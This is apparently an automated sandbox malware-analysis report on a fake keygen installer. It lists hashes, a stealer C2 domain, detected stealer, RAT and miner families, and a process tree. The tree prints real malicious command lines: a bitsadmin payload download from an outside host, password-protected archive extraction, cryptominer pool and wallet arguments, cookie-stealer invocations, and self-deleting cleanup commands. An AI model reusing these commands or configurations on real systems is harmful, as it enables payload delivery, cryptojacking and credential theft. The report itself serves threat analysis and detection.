Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1266s
  • max time network
    1800s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    26-04-2021 13:35

General

  • Target

    keygen-step-4d.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 49 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 12 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 45 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2380
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2696
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2688
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
      • Modifies registry class
      PID:2580
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
      1⤵
        PID:2408
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
        1⤵
          PID:1864
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s SENS
          1⤵
            PID:1388
          • C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe
            "C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe"
            1⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:3984
            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
              2⤵
              • Executes dropped EXE
              • Drops file in Program Files directory
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:2756
              • C:\Windows\SysWOW64\rundll32.exe
                "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                3⤵
                • Loads dropped DLL
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:3252
            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
              2⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:3520
            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
              2⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:1412
              • C:\Users\Admin\AppData\Local\Temp\is-U9JC1.tmp\Install.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-U9JC1.tmp\Install.tmp" /SL5="$401A0,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                3⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:1808
                • C:\Users\Admin\AppData\Local\Temp\is-HOG90.tmp\Ultra.exe
                  "C:\Users\Admin\AppData\Local\Temp\is-HOG90.tmp\Ultra.exe" /S /UID=burnerch1
                  4⤵
                  • Drops file in Drivers directory
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3116
                  • C:\Program Files\Windows NT\YBBTWDHIOQ\ultramediaburner.exe
                    "C:\Program Files\Windows NT\YBBTWDHIOQ\ultramediaburner.exe" /VERYSILENT
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:3916
                    • C:\Users\Admin\AppData\Local\Temp\is-J57AQ.tmp\ultramediaburner.tmp
                      "C:\Users\Admin\AppData\Local\Temp\is-J57AQ.tmp\ultramediaburner.tmp" /SL5="$301E8,281924,62464,C:\Program Files\Windows NT\YBBTWDHIOQ\ultramediaburner.exe" /VERYSILENT
                      6⤵
                      • Executes dropped EXE
                      • Drops file in Program Files directory
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of WriteProcessMemory
                      PID:2252
                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                        7⤵
                        • Executes dropped EXE
                        PID:3996
                  • C:\Users\Admin\AppData\Local\Temp\2e-cf490-9e2-63a83-f6567b8a6741d\Kegezholecu.exe
                    "C:\Users\Admin\AppData\Local\Temp\2e-cf490-9e2-63a83-f6567b8a6741d\Kegezholecu.exe"
                    5⤵
                    • Executes dropped EXE
                    • Checks computer location settings
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1724
                  • C:\Users\Admin\AppData\Local\Temp\2d-f1811-a53-cb3a0-938224ffe543d\Dilalisyzhe.exe
                    "C:\Users\Admin\AppData\Local\Temp\2d-f1811-a53-cb3a0-938224ffe543d\Dilalisyzhe.exe"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:732
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mpquxkon.gm3\instEU.exe & exit
                      6⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4940
                      • C:\Users\Admin\AppData\Local\Temp\mpquxkon.gm3\instEU.exe
                        C:\Users\Admin\AppData\Local\Temp\mpquxkon.gm3\instEU.exe
                        7⤵
                        • Executes dropped EXE
                        PID:5052
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iines2ne.04x\google-game.exe & exit
                      6⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2224
                      • C:\Users\Admin\AppData\Local\Temp\iines2ne.04x\google-game.exe
                        C:\Users\Admin\AppData\Local\Temp\iines2ne.04x\google-game.exe
                        7⤵
                        • Executes dropped EXE
                        • Drops file in Program Files directory
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:4348
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                          8⤵
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:4724
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1cukne5s.amw\md1_1eaf.exe & exit
                      6⤵
                        PID:4076
                        • C:\Users\Admin\AppData\Local\Temp\1cukne5s.amw\md1_1eaf.exe
                          C:\Users\Admin\AppData\Local\Temp\1cukne5s.amw\md1_1eaf.exe
                          7⤵
                            PID:4752
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y0xi3ski.cyd\askinstall39.exe & exit
                          6⤵
                            PID:5056
                            • C:\Users\Admin\AppData\Local\Temp\y0xi3ski.cyd\askinstall39.exe
                              C:\Users\Admin\AppData\Local\Temp\y0xi3ski.cyd\askinstall39.exe
                              7⤵
                              • Executes dropped EXE
                              PID:4776
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c taskkill /f /im chrome.exe
                                8⤵
                                  PID:5684
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /f /im chrome.exe
                                    9⤵
                                    • Kills process with taskkill
                                    PID:6036
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nnu4doks.emn\y1.exe & exit
                              6⤵
                                PID:5408
                                • C:\Users\Admin\AppData\Local\Temp\nnu4doks.emn\y1.exe
                                  C:\Users\Admin\AppData\Local\Temp\nnu4doks.emn\y1.exe
                                  7⤵
                                  • Executes dropped EXE
                                  PID:5668
                                  • C:\Users\Admin\AppData\Local\Temp\aqbKS71MGg.exe
                                    "C:\Users\Admin\AppData\Local\Temp\aqbKS71MGg.exe"
                                    8⤵
                                    • Executes dropped EXE
                                    • Modifies system certificate store
                                    PID:5960
                                    • C:\Users\Admin\AppData\Roaming\1619446611586.exe
                                      "C:\Users\Admin\AppData\Roaming\1619446611586.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619446611586.txt"
                                      9⤵
                                      • Executes dropped EXE
                                      PID:5092
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\aqbKS71MGg.exe"
                                      9⤵
                                        PID:4148
                                        • C:\Windows\SysWOW64\PING.EXE
                                          ping 127.0.0.1 -n 3
                                          10⤵
                                          • Runs ping.exe
                                          PID:6100
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\nnu4doks.emn\y1.exe"
                                      8⤵
                                        PID:4952
                                        • C:\Windows\SysWOW64\timeout.exe
                                          timeout /T 10 /NOBREAK
                                          9⤵
                                          • Delays execution with timeout.exe
                                          PID:5936
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vxhvu4db.tvh\SunLabsPlayer.exe /S & exit
                                    6⤵
                                      PID:5828
                                      • C:\Users\Admin\AppData\Local\Temp\vxhvu4db.tvh\SunLabsPlayer.exe
                                        C:\Users\Admin\AppData\Local\Temp\vxhvu4db.tvh\SunLabsPlayer.exe /S
                                        7⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Drops file in Program Files directory
                                        PID:5368
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrBCEF.tmp\tempfile.ps1"
                                          8⤵
                                            PID:4816
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrBCEF.tmp\tempfile.ps1"
                                            8⤵
                                              PID:5756
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrBCEF.tmp\tempfile.ps1"
                                              8⤵
                                                PID:5428
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrBCEF.tmp\tempfile.ps1"
                                                8⤵
                                                  PID:4120
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrBCEF.tmp\tempfile.ps1"
                                                  8⤵
                                                    PID:4760
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrBCEF.tmp\tempfile.ps1"
                                                    8⤵
                                                      PID:4140
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrBCEF.tmp\tempfile.ps1"
                                                      8⤵
                                                      • Checks for any installed AV software in registry
                                                      PID:3912
                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                      "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                      8⤵
                                                      • Download via BitsAdmin
                                                      PID:5220
                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -peMb4BpZVBNLXLM1 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                      8⤵
                                                      • Executes dropped EXE
                                                      PID:5132
                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pMlM8v3G9Pha8YLt -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                      8⤵
                                                      • Executes dropped EXE
                                                      PID:5112
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrBCEF.tmp\tempfile.ps1"
                                                      8⤵
                                                        PID:5648
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrBCEF.tmp\tempfile.ps1"
                                                        8⤵
                                                          PID:5756
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrBCEF.tmp\tempfile.ps1"
                                                          8⤵
                                                            PID:5776
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrBCEF.tmp\tempfile.ps1"
                                                            8⤵
                                                              PID:1580
                                                              • C:\Windows\System32\Conhost.exe
                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                9⤵
                                                                  PID:4852
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrBCEF.tmp\tempfile.ps1"
                                                                8⤵
                                                                  PID:4576
                                                                  • C:\Windows\System32\Conhost.exe
                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    9⤵
                                                                      PID:4140
                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                    C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\gqAAFX\gqAAFX.dll" gqAAFX
                                                                    8⤵
                                                                    • Loads dropped DLL
                                                                    PID:5196
                                                                    • C:\Windows\system32\rundll32.exe
                                                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\gqAAFX\gqAAFX.dll" gqAAFX
                                                                      9⤵
                                                                      • Loads dropped DLL
                                                                      • Drops file in System32 directory
                                                                      PID:4104
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrBCEF.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:3540
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrBCEF.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:6012
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrBCEF.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:1776
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrBCEF.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:4888
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrBCEF.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:5320
                                                                            • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                              "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                              8⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              PID:2268
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\euqsy04q.yay\inst.exe & exit
                                                                          6⤵
                                                                            PID:6004
                                                                            • C:\Users\Admin\AppData\Local\Temp\euqsy04q.yay\inst.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\euqsy04q.yay\inst.exe
                                                                              7⤵
                                                                                PID:5576
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jrvuqf4b.whj\GcleanerWW.exe /mixone & exit
                                                                              6⤵
                                                                                PID:5208
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nlrnhlz0.23k\toolspab1.exe & exit
                                                                                6⤵
                                                                                  PID:5344
                                                                                  • C:\Users\Admin\AppData\Local\Temp\nlrnhlz0.23k\toolspab1.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\nlrnhlz0.23k\toolspab1.exe
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:4384
                                                                                    • C:\Users\Admin\AppData\Local\Temp\nlrnhlz0.23k\toolspab1.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\nlrnhlz0.23k\toolspab1.exe
                                                                                      8⤵
                                                                                        PID:5576
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l4tqtdmi.vnb\app.exe /8-2222 & exit
                                                                                    6⤵
                                                                                      PID:5616
                                                                                      • C:\Users\Admin\AppData\Local\Temp\l4tqtdmi.vnb\app.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\l4tqtdmi.vnb\app.exe /8-2222
                                                                                        7⤵
                                                                                          PID:5124
                                                                                          • C:\Users\Admin\AppData\Local\Temp\l4tqtdmi.vnb\app.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\l4tqtdmi.vnb\app.exe" /8-2222
                                                                                            8⤵
                                                                                            • Executes dropped EXE
                                                                                            • Modifies data under HKEY_USERS
                                                                                            PID:1476
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\242edxts.hdy\c7ae36fa.exe & exit
                                                                                        6⤵
                                                                                          PID:5836
                                                                                          • C:\Users\Admin\AppData\Local\Temp\242edxts.hdy\c7ae36fa.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\242edxts.hdy\c7ae36fa.exe
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            • Checks SCSI registry key(s)
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            PID:4288
                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  • Modifies system certificate store
                                                                                  PID:4168
                                                                                  • C:\Users\Admin\AppData\Roaming\AE76.tmp.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\AE76.tmp.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:5952
                                                                                    • C:\Users\Admin\AppData\Roaming\AE76.tmp.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\AE76.tmp.exe"
                                                                                      4⤵
                                                                                      • Executes dropped EXE
                                                                                      • Checks processor information in registry
                                                                                      PID:5312
                                                                                  • C:\Users\Admin\AppData\Roaming\B26E.tmp.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\B26E.tmp.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • Adds Run key to start application
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:6084
                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                      -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w3562@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                      4⤵
                                                                                        PID:6048
                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w742 --cpu-max-threads-hint 50 -r 9999
                                                                                        4⤵
                                                                                        • Blocklisted process makes network request
                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                        PID:2284
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                      3⤵
                                                                                        PID:4852
                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                          ping 127.0.0.1
                                                                                          4⤵
                                                                                          • Runs ping.exe
                                                                                          PID:5784
                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Checks whether UAC is enabled
                                                                                      PID:4448
                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Adds Run key to start application
                                                                                      PID:4928
                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                        3⤵
                                                                                          PID:5488
                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5224
                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          PID:5668
                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          3⤵
                                                                                            PID:4028
                                                                                      • c:\windows\system32\svchost.exe
                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                        1⤵
                                                                                          PID:1272
                                                                                        • c:\windows\system32\svchost.exe
                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                          1⤵
                                                                                            PID:1228
                                                                                          • c:\windows\system32\svchost.exe
                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                            1⤵
                                                                                              PID:1108
                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                              1⤵
                                                                                              • Suspicious use of SetThreadContext
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:3928
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                2⤵
                                                                                                • Drops file in System32 directory
                                                                                                • Checks processor information in registry
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:3732
                                                                                            • c:\windows\system32\svchost.exe
                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                              1⤵
                                                                                              • Drops file in System32 directory
                                                                                              PID:1020
                                                                                              • C:\Users\Admin\AppData\Roaming\svwidjs
                                                                                                C:\Users\Admin\AppData\Roaming\svwidjs
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of SetThreadContext
                                                                                                PID:1188
                                                                                                • C:\Users\Admin\AppData\Roaming\svwidjs
                                                                                                  C:\Users\Admin\AppData\Roaming\svwidjs
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Checks SCSI registry key(s)
                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                  PID:5496
                                                                                              • C:\Users\Admin\AppData\Roaming\fbwidjs
                                                                                                C:\Users\Admin\AppData\Roaming\fbwidjs
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Checks whether UAC is enabled
                                                                                                • Checks SCSI registry key(s)
                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                PID:4752
